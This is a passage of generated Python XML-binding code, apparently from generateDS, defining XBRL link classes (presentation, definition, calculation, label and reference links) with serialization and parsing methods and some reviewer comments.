                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # Invent a numbered prefix for any other namespace.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='presentationLink', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order."""
        for title_ in self.title:
            title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for loc_ in self.loc:
            loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
        for presentationArc_ in self.presentationArc:
            presentationArc_.export(outfile, level, namespace_='link:', name_='presentationArc', pretty_print=pretty_print)

    def build(self, node):
        """Populate this object from an element-tree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Collect all attributes into the wildcard attribute map."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build the member object matching *nodeName_* from *child_*.

        Raises NotImplementedError when a <title> or <documentation> child
        carries no (xsi:)type attribute naming a concrete class.

        NOTE: the generator originally emitted a second, unreachable
        'documentation' branch (documentationType.factory()); it has been
        removed as dead code.
        """
        if nodeName_ == 'title':
            obj_ = self._build_typed_child_(child_, 'title')
            self.title.append(obj_)
            obj_.original_tagname_ = 'title'
        elif nodeName_ == 'documentation':
            obj_ = self._build_typed_child_(child_, 'documentation')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        elif nodeName_ == 'loc':
            obj_ = locatorType.factory()
            obj_.build(child_)
            self.loc.append(obj_)
            obj_.original_tagname_ = 'loc'
        elif nodeName_ == 'presentationArc':
            obj_ = presentationArc.factory()
            obj_.build(child_)
            self.presentationArc.append(obj_)
            obj_.original_tagname_ = 'presentationArc'

    def _build_typed_child_(self, child_, tag_):
        """Instantiate and build the class named by the child's (xsi:)type attribute."""
        type_name_ = child_.attrib.get(
            '{http://www.w3.org/2001/XMLSchema-instance}type')
        if type_name_ is None:
            type_name_ = child_.attrib.get('type')
        if type_name_ is None:
            raise NotImplementedError(
                'Class not implemented for <%s> element' % (tag_, ))
        # Strip any namespace prefix ("ns:Type" -> "Type").
        type_names_ = type_name_.split(':')
        type_name_ = type_names_[0] if len(type_names_) == 1 else type_names_[1]
        obj_ = globals()[type_name_].factory()
        obj_.build(child_)
        return obj_
# end class presentationLink
class definitionLink(GeneratedsSuper):
    """definition extended link element definition"""
    subclass = None
    superclass = None

    def __init__(self, title=None, documentation=None, loc=None, definitionArc=None):
        self.original_tagname_ = None
        # Each collection defaults to a fresh list; instances never share state.
        self.title = [] if title is None else title
        self.documentation = [] if documentation is None else documentation
        self.loc = [] if loc is None else loc
        self.definitionArc = [] if definitionArc is None else definitionArc
        self.anyAttributes_ = {}

    def factory(*args_, **kwargs_):
        """Create an instance of the registered subclass, or of this class."""
        if definitionLink.subclass:
            return definitionLink.subclass(*args_, **kwargs_)
        else:
            return definitionLink(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def add_title(self, value): self.title.append(value)
    def insert_title_at(self, index, value): self.title.insert(index, value)
    def replace_title_at(self, index, value): self.title[index] = value
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_loc(self): return self.loc
    def set_loc(self, loc): self.loc = loc
    def add_loc(self, value): self.loc.append(value)
    def insert_loc_at(self, index, value): self.loc.insert(index, value)
    def replace_loc_at(self, index, value): self.loc[index] = value
    def get_definitionArc(self): return self.definitionArc
    def set_definitionArc(self, definitionArc): self.definitionArc = definitionArc
    def add_definitionArc(self, value): self.definitionArc.append(value)
    def insert_definitionArc_at(self, index, value): self.definitionArc.insert(index, value)
    def replace_definitionArc_at(self, index, value): self.definitionArc[index] = value
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_

    def hasContent_(self):
        """Return True when any child element is present."""
        return bool(
            self.title or
            self.documentation or
            self.loc or
            self.definitionArc
        )

    def export(self, outfile, level, namespace_='finassist:', name_='definitionLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Serialize this element (attributes and children) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Re-emit under the tag name this object was originally parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='definitionLink')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='definitionLink', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='definitionLink'):
        """Write wildcard (xs:anyAttribute) attributes, expanding Clark-notation namespaces."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # xsi-namespaced attribute: emit with the conventional xsi: prefix.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # Invent a numbered prefix for any other namespace.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='definitionLink', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order."""
        for title_ in self.title:
            title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for loc_ in self.loc:
            loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
        for definitionArc_ in self.definitionArc:
            definitionArc_.export(outfile, level, namespace_='link:', name_='definitionArc', pretty_print=pretty_print)

    def build(self, node):
        """Populate this object from an element-tree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Collect all attributes into the wildcard attribute map."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build the member object matching *nodeName_* from *child_*.

        Raises NotImplementedError when a <title> or <documentation> child
        carries no (xsi:)type attribute naming a concrete class.

        NOTE: the generator originally emitted a second, unreachable
        'documentation' branch (documentationType.factory()); it has been
        removed as dead code.
        """
        if nodeName_ == 'title':
            obj_ = self._build_typed_child_(child_, 'title')
            self.title.append(obj_)
            obj_.original_tagname_ = 'title'
        elif nodeName_ == 'documentation':
            obj_ = self._build_typed_child_(child_, 'documentation')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        elif nodeName_ == 'loc':
            obj_ = locatorType.factory()
            obj_.build(child_)
            self.loc.append(obj_)
            obj_.original_tagname_ = 'loc'
        elif nodeName_ == 'definitionArc':
            # definitionArc may be substituted via xsi:type; resolve the class first.
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.definitionArc.append(obj_)
            obj_.original_tagname_ = 'definitionArc'

    def _build_typed_child_(self, child_, tag_):
        """Instantiate and build the class named by the child's (xsi:)type attribute."""
        type_name_ = child_.attrib.get(
            '{http://www.w3.org/2001/XMLSchema-instance}type')
        if type_name_ is None:
            type_name_ = child_.attrib.get('type')
        if type_name_ is None:
            raise NotImplementedError(
                'Class not implemented for <%s> element' % (tag_, ))
        # Strip any namespace prefix ("ns:Type" -> "Type").
        type_names_ = type_name_.split(':')
        type_name_ = type_names_[0] if len(type_names_) == 1 else type_names_[1]
        obj_ = globals()[type_name_].factory()
        obj_.build(child_)
        return obj_
# end class definitionLink
class calculationLink(GeneratedsSuper):
    """calculation extended link element definition"""
    subclass = None
    superclass = None

    def __init__(self, title=None, documentation=None, loc=None, calculationArc=None):
        self.original_tagname_ = None
        # Each collection defaults to a fresh list; instances never share state.
        self.title = [] if title is None else title
        self.documentation = [] if documentation is None else documentation
        self.loc = [] if loc is None else loc
        self.calculationArc = [] if calculationArc is None else calculationArc
        self.anyAttributes_ = {}

    def factory(*args_, **kwargs_):
        """Create an instance of the registered subclass, or of this class."""
        if calculationLink.subclass:
            return calculationLink.subclass(*args_, **kwargs_)
        else:
            return calculationLink(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def add_title(self, value): self.title.append(value)
    def insert_title_at(self, index, value): self.title.insert(index, value)
    def replace_title_at(self, index, value): self.title[index] = value
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_loc(self): return self.loc
    def set_loc(self, loc): self.loc = loc
    def add_loc(self, value): self.loc.append(value)
    def insert_loc_at(self, index, value): self.loc.insert(index, value)
    def replace_loc_at(self, index, value): self.loc[index] = value
    def get_calculationArc(self): return self.calculationArc
    def set_calculationArc(self, calculationArc): self.calculationArc = calculationArc
    def add_calculationArc(self, value): self.calculationArc.append(value)
    def insert_calculationArc_at(self, index, value): self.calculationArc.insert(index, value)
    def replace_calculationArc_at(self, index, value): self.calculationArc[index] = value
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_

    def hasContent_(self):
        """Return True when any child element is present."""
        return bool(
            self.title or
            self.documentation or
            self.loc or
            self.calculationArc
        )

    def export(self, outfile, level, namespace_='finassist:', name_='calculationLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Serialize this element (attributes and children) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Re-emit under the tag name this object was originally parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='calculationLink')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='calculationLink', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='calculationLink'):
        """Write wildcard (xs:anyAttribute) attributes, expanding Clark-notation namespaces."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # xsi-namespaced attribute: emit with the conventional xsi: prefix.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # Invent a numbered prefix for any other namespace.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='calculationLink', fromsubclass_=False, pretty_print=True):
        """Write child elements in schema order."""
        for title_ in self.title:
            title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for loc_ in self.loc:
            loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
        for calculationArc_ in self.calculationArc:
            calculationArc_.export(outfile, level, namespace_='link:', name_='calculationArc', pretty_print=pretty_print)

    def build(self, node):
        """Populate this object from an element-tree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Collect all attributes into the wildcard attribute map."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Build the member object matching *nodeName_* from *child_*.

        Raises NotImplementedError when a <title> or <documentation> child
        carries no (xsi:)type attribute naming a concrete class.

        NOTE: the generator originally emitted a second, unreachable
        'documentation' branch (documentationType.factory()); it has been
        removed as dead code.
        """
        if nodeName_ == 'title':
            obj_ = self._build_typed_child_(child_, 'title')
            self.title.append(obj_)
            obj_.original_tagname_ = 'title'
        elif nodeName_ == 'documentation':
            obj_ = self._build_typed_child_(child_, 'documentation')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        elif nodeName_ == 'loc':
            obj_ = locatorType.factory()
            obj_.build(child_)
            self.loc.append(obj_)
            obj_.original_tagname_ = 'loc'
        elif nodeName_ == 'calculationArc':
            obj_ = calculationArc.factory()
            obj_.build(child_)
            self.calculationArc.append(obj_)
            obj_.original_tagname_ = 'calculationArc'

    def _build_typed_child_(self, child_, tag_):
        """Instantiate and build the class named by the child's (xsi:)type attribute."""
        type_name_ = child_.attrib.get(
            '{http://www.w3.org/2001/XMLSchema-instance}type')
        if type_name_ is None:
            type_name_ = child_.attrib.get('type')
        if type_name_ is None:
            raise NotImplementedError(
                'Class not implemented for <%s> element' % (tag_, ))
        # Strip any namespace prefix ("ns:Type" -> "Type").
        type_names_ = type_name_.split(':')
        type_name_ = type_names_[0] if len(type_names_) == 1 else type_names_[1]
        obj_ = globals()[type_name_].factory()
        obj_.build(child_)
        return obj_
# end class calculationLink
class labelLink(GeneratedsSuper):
    """label extended link element definition"""
    subclass = None
    superclass = None
    def __init__(self, title=None, documentation=None, loc=None, labelArc=None, label=None):
        self.original_tagname_ = None
        # Child-element collections; a fresh list is created per instance
        # when the caller passes None (avoids shared mutable defaults).
        self.title = [] if title is None else title
        self.documentation = [] if documentation is None else documentation
        self.loc = [] if loc is None else loc
        self.labelArc = [] if labelArc is None else labelArc
        self.label = [] if label is None else label
        # Wildcard (anyAttribute) attributes captured from the source doc.
        self.anyAttributes_ = {}
    def factory(*args_, **kwargs_):
        # Honor a registered subclass override, if any.
        if labelLink.subclass:
            return labelLink.subclass(*args_, **kwargs_)
        else:
            return labelLink(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def add_title(self, value): self.title.append(value)
    def insert_title_at(self, index, value): self.title.insert(index, value)
    def replace_title_at(self, index, value): self.title[index] = value
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_loc(self): return self.loc
    def set_loc(self, loc): self.loc = loc
    def add_loc(self, value): self.loc.append(value)
    def insert_loc_at(self, index, value): self.loc.insert(index, value)
    def replace_loc_at(self, index, value): self.loc[index] = value
    def get_labelArc(self): return self.labelArc
    def set_labelArc(self, labelArc): self.labelArc = labelArc
    def add_labelArc(self, value): self.labelArc.append(value)
    def insert_labelArc_at(self, index, value): self.labelArc.insert(index, value)
    def replace_labelArc_at(self, index, value): self.labelArc[index] = value
    def get_label(self): return self.label
    def set_label(self, label): self.label = label
    def add_label(self, value): self.label.append(value)
    def insert_label_at(self, index, value): self.label.insert(index, value)
    def replace_label_at(self, index, value): self.label[index] = value
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        # True when at least one child element must be serialized.
        return bool(
            self.title or
            self.documentation or
            self.loc or
            self.labelArc or
            self.label
        )
    def export(self, outfile, level, namespace_='finassist:', name_='labelLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Write this element (tag, attributes, children) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Preserve the tag name this object was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='labelLink')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='labelLink', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No children: self-closing form.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='labelLink'):
        """Write wildcard (anyAttribute) attributes collected during parse."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # Clark-notation xsi attribute: re-serialize with 'xsi:' prefix.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): this emits purely numeric namespace
                            # prefixes (e.g. xmlns:1="..."), which are not valid
                            # XML NCNames -- kept as-is for compatibility with
                            # the generator's output; confirm before changing.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='labelLink', fromsubclass_=False, pretty_print=True):
        """Serialize every child element of this labelLink to outfile."""
        eol_ = '\n' if pretty_print else ''
        for title_ in self.title:
            title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for loc_ in self.loc:
            loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
        for labelArc_ in self.labelArc:
            labelArc_.export(outfile, level, namespace_='link:', name_='labelArc', pretty_print=pretty_print)
        for label_ in self.label:
            label_.export(outfile, level, namespace_='link:', name_='label', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree/lxml node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Capture all attributes not consumed elsewhere into anyAttributes_."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch a parsed child element into the matching member list.

        <title>/<documentation> resolve a concrete class from their xsi:type
        (or plain 'type') attribute and raise NotImplementedError when none
        is present; other tags use fixed implementation classes.
        """
        if nodeName_ == 'title':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <title> element')
            self.title.append(obj_)
            obj_.original_tagname_ = 'title'
        elif nodeName_ == 'documentation':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <documentation> element')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        # NOTE(review): an unreachable duplicate `elif nodeName_ ==
        # 'documentation'` branch emitted by the generator was removed here.
        elif nodeName_ == 'loc':
            obj_ = locatorType.factory()
            obj_.build(child_)
            self.loc.append(obj_)
            obj_.original_tagname_ = 'loc'
        elif nodeName_ == 'labelArc':
            # Arc class may be substituted via xsi:type.
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.labelArc.append(obj_)
            obj_.original_tagname_ = 'labelArc'
        elif nodeName_ == 'label':
            obj_ = label.factory()
            obj_.build(child_)
            self.label.append(obj_)
            obj_.original_tagname_ = 'label'
# end class labelLink
class referenceLink(GeneratedsSuper):
    """reference extended link element definition"""
    subclass = None
    superclass = None
    def __init__(self, title=None, documentation=None, loc=None, referenceArc=None, reference=None):
        self.original_tagname_ = None
        # Child-element collections; a fresh list is created per instance
        # when the caller passes None (avoids shared mutable defaults).
        self.title = [] if title is None else title
        self.documentation = [] if documentation is None else documentation
        self.loc = [] if loc is None else loc
        self.referenceArc = [] if referenceArc is None else referenceArc
        self.reference = [] if reference is None else reference
        # Wildcard (anyAttribute) attributes captured from the source doc.
        self.anyAttributes_ = {}
    def factory(*args_, **kwargs_):
        # Honor a registered subclass override, if any.
        if referenceLink.subclass:
            return referenceLink.subclass(*args_, **kwargs_)
        else:
            return referenceLink(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def add_title(self, value): self.title.append(value)
    def insert_title_at(self, index, value): self.title.insert(index, value)
    def replace_title_at(self, index, value): self.title[index] = value
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_loc(self): return self.loc
    def set_loc(self, loc): self.loc = loc
    def add_loc(self, value): self.loc.append(value)
    def insert_loc_at(self, index, value): self.loc.insert(index, value)
    def replace_loc_at(self, index, value): self.loc[index] = value
    def get_referenceArc(self): return self.referenceArc
    def set_referenceArc(self, referenceArc): self.referenceArc = referenceArc
    def add_referenceArc(self, value): self.referenceArc.append(value)
    def insert_referenceArc_at(self, index, value): self.referenceArc.insert(index, value)
    def replace_referenceArc_at(self, index, value): self.referenceArc[index] = value
    def get_reference(self): return self.reference
    def set_reference(self, reference): self.reference = reference
    def add_reference(self, value): self.reference.append(value)
    def insert_reference_at(self, index, value): self.reference.insert(index, value)
    def replace_reference_at(self, index, value): self.reference[index] = value
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        # True when at least one child element must be serialized.
        return bool(
            self.title or
            self.documentation or
            self.loc or
            self.referenceArc or
            self.reference
        )
    def export(self, outfile, level, namespace_='finassist:', name_='referenceLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Write this element (tag, attributes, children) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Preserve the tag name this object was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='referenceLink')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='referenceLink', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No children: self-closing form.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='referenceLink'):
        """Write wildcard (anyAttribute) attributes collected during parse."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # Clark-notation xsi attribute: re-serialize with 'xsi:' prefix.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): this emits purely numeric namespace
                            # prefixes (e.g. xmlns:1="..."), which are not valid
                            # XML NCNames -- kept as-is for compatibility with
                            # the generator's output; confirm before changing.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='referenceLink', fromsubclass_=False, pretty_print=True):
        """Serialize every child element of this referenceLink to outfile."""
        eol_ = '\n' if pretty_print else ''
        for title_ in self.title:
            title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for loc_ in self.loc:
            loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
        for referenceArc_ in self.referenceArc:
            referenceArc_.export(outfile, level, namespace_='link:', name_='referenceArc', pretty_print=pretty_print)
        for reference_ in self.reference:
            reference_.export(outfile, level, namespace_='link:', name_='reference', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree/lxml node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
